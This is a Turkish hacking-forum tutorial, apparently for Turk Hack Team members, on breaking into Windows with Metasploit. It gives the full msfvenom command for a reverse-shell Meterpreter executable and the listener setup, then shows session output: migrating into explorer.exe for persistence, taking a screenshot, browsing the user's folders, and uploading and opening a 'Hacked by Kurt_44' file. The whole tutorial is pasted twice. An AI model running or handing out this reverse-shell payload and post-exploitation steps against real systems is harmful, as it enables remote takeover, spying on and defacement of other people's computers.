Merhaba sayın Turk Hack Team üyeleri bu gün sizlerle msfvenom kullanarak windows a nasıl sızacağınızı göstereceğim
ilk olarak terminali açıyoruz ve msfvenom -p windows/meterpreter/reverse_tcp LHOST=kendi ip adresiniz LPORT=4443 -f exe -o /home/kurt/Masaüstü/G3.exe
ardından msfconsole u açıyoruz ve terminalimize bunları tek tek yazıyoruz
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST kendi ip adresi
set LPORT 4443
exploit diyoruz ve dinlemeye başlıyor. Şimde kurban makinemize oluşturduğumuz exe yi atıp çalıştırıyoruz
otururmumuzu aldık ve ps komutunu çalıştırıyoruz (Meterpreter 1)(C:\Users\vboxuser\Desktop) > ps
(Meterpreter 1)(C:\Users\vboxuser\Desktop) > migrate 1704
[*] Migrating from 2888 to 1704...
[*] Migration completed successfully.
(Meterpreter 1)(C:\Windows\system32) >
burada explorer.exe uygulamasına geçtik bi bakıma yatay hareket yaptık. artık zararlı exe silinse de oturumumuz açık kalacak
screenshot komutu ile de anlık ekran görüntüsü aldık ve (Meterpreter 1)(C:\Windows\system32) > screenshot
Screenshot saved to: /home/kurt/Desktop/auCSNPpY.jpeg
home kurt desktop adresine kaydetmiş
gördüğünüz gibi ekran görüntüsünde bu çıktı
şimdi de kullanıcı profiline girdik cd C:/Users/vboxuser komutu ile
(Meterpreter 1)(C:\Windows\system32) > cd C:/Users/vboxuser
ordan da
(Meterpreter 1)(C:\Users\vboxuser) > cd Desktop dedik ve Desktop klasörüse girdik
(Meterpreter 1)(C:\Users\vboxuser\Desktop) > ls komutu ile de desktop daki uygulama ve dosyalara baktık.
sonuç
Listing: C:\Users\vboxuser\Desktop
==================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 147 fil 2026-01-23 17:34:19 +0300 G3.exe.url
100666/rw-rw-rw- 142 fil 2026-01-23 14:53:12 +0300 desktop.ini
evet.. pek işe yarar bişi bulamadık o yüzden Dawnloads a bakacağım
(Meterpreter 1)(C:\Users\vboxuser\Desktop) > cd ../Downloads
(Meterpreter 1)(C:\Users\vboxuser\Downloads) > ls
Listing: C:\Users\vboxuser\Downloads
====================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100777/rwxrwxrwx 7168 fil 2026-01-23 17:34:34 +0300 G3.exe
100666/rw-rw-rw- 142 fil 2026-01-23 14:53:13 +0300 desktop.ini
(Meterpreter 1)(C:\Users\vboxuser\Downloads) >
yani pek bi fark yok :d ama o zaman bizde ekrana yazı yazdıralım
ilk olarak yeni bir terminal açtım ve echo "Hacked by Kurt_44" > /home/kurt/Masaüstü/Kurt.txt
bu komut masaüstünde txt dosyası yaptı biz de şimdi bunu windows a atacağız ve sonra ekranda açacağız
(Meterpreter 2)(C:\Users\vboxuser\Downloads) > upload /home/kurt/Masaüstü/Kurt.txt C:/Users/vboxuser/Desktop/Kurt.txt
[*] Uploading : /home/kurt/Masaüstü/Kurt.txt -> C:/Users/vboxuser/Desktop/Kurt.txt
[*] Uploaded 18.00 B of 18.00 B (100.0%): /home/kurt/Masaüstü/Kurt.txt -> C:/Users/vboxuser/Desktop/Kurt.txt
[*] Completed : /home/kurt/Masaüstü/Kurt.txt -> C:/Users/vboxuser/Desktop/Kurt.txt
(Meterpreter 2)(C:\Users\vboxuser\Downloads) >
ve sanal makinemize dosyayı yükledik şimdi de ekranda göstereceğiz
(Meterpreter 2)(C:\Users\vboxuser\Downloads) > execute -f notepad.exe -a C:/Users/vboxuser/Desktop/Kurt.txt
Process 2416 created.
burada execute -f notepad.exe -a C:/Users/vboxuser/Desktop/Kurt.txt komutunu girdik ve ekranda açıldı txt dosyamız
konumuz bu kadardı arkadaşlar okuduğunuz için teşekkürler
ilk olarak terminali açıyoruz ve msfvenom -p windows/meterpreter/reverse_tcp LHOST=kendi ip adresiniz LPORT=4443 -f exe -o /home/kurt/Masaüstü/G3.exe
ardından msfconsole u açıyoruz ve terminalimize bunları tek tek yazıyoruz
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST kendi ip adresi
set LPORT 4443
exploit diyoruz ve dinlemeye başlıyor. Şimde kurban makinemize oluşturduğumuz exe yi atıp çalıştırıyoruz
otururmumuzu aldık ve ps komutunu çalıştırıyoruz (Meterpreter 1)(C:\Users\vboxuser\Desktop) > ps
(Meterpreter 1)(C:\Users\vboxuser\Desktop) > migrate 1704
[*] Migrating from 2888 to 1704...
[*] Migration completed successfully.
(Meterpreter 1)(C:\Windows\system32) >
burada explorer.exe uygulamasına geçtik bi bakıma yatay hareket yaptık. artık zararlı exe silinse de oturumumuz açık kalacak
screenshot komutu ile de anlık ekran görüntüsü aldık ve (Meterpreter 1)(C:\Windows\system32) > screenshot
Screenshot saved to: /home/kurt/Desktop/auCSNPpY.jpeg
home kurt desktop adresine kaydetmiş
gördüğünüz gibi ekran görüntüsünde bu çıktı
şimdi de kullanıcı profiline girdik cd C:/Users/vboxuser komutu ile
(Meterpreter 1)(C:\Windows\system32) > cd C:/Users/vboxuser
ordan da
(Meterpreter 1)(C:\Users\vboxuser) > cd Desktop dedik ve Desktop klasörüse girdik
(Meterpreter 1)(C:\Users\vboxuser\Desktop) > ls komutu ile de desktop daki uygulama ve dosyalara baktık.
sonuç
Listing: C:\Users\vboxuser\Desktop
==================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 147 fil 2026-01-23 17:34:19 +0300 G3.exe.url
100666/rw-rw-rw- 142 fil 2026-01-23 14:53:12 +0300 desktop.ini
evet.. pek işe yarar bişi bulamadık o yüzden Dawnloads a bakacağım
(Meterpreter 1)(C:\Users\vboxuser\Desktop) > cd ../Downloads
(Meterpreter 1)(C:\Users\vboxuser\Downloads) > ls
Listing: C:\Users\vboxuser\Downloads
====================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100777/rwxrwxrwx 7168 fil 2026-01-23 17:34:34 +0300 G3.exe
100666/rw-rw-rw- 142 fil 2026-01-23 14:53:13 +0300 desktop.ini
(Meterpreter 1)(C:\Users\vboxuser\Downloads) >
yani pek bi fark yok :d ama o zaman bizde ekrana yazı yazdıralım
ilk olarak yeni bir terminal açtım ve echo "Hacked by Kurt_44" > /home/kurt/Masaüstü/Kurt.txt
bu komut masaüstünde txt dosyası yaptı biz de şimdi bunu windows a atacağız ve sonra ekranda açacağız
(Meterpreter 2)(C:\Users\vboxuser\Downloads) > upload /home/kurt/Masaüstü/Kurt.txt C:/Users/vboxuser/Desktop/Kurt.txt
[*] Uploading : /home/kurt/Masaüstü/Kurt.txt -> C:/Users/vboxuser/Desktop/Kurt.txt
[*] Uploaded 18.00 B of 18.00 B (100.0%): /home/kurt/Masaüstü/Kurt.txt -> C:/Users/vboxuser/Desktop/Kurt.txt
[*] Completed : /home/kurt/Masaüstü/Kurt.txt -> C:/Users/vboxuser/Desktop/Kurt.txt
(Meterpreter 2)(C:\Users\vboxuser\Downloads) >
ve sanal makinemize dosyayı yükledik şimdi de ekranda göstereceğiz
(Meterpreter 2)(C:\Users\vboxuser\Downloads) > execute -f notepad.exe -a C:/Users/vboxuser/Desktop/Kurt.txt
Process 2416 created.
burada execute -f notepad.exe -a C:/Users/vboxuser/Desktop/Kurt.txt komutunu girdik ve ekranda açıldı txt dosyamız
konumuz bu kadardı arkadaşlar okuduğunuz için teşekkürler
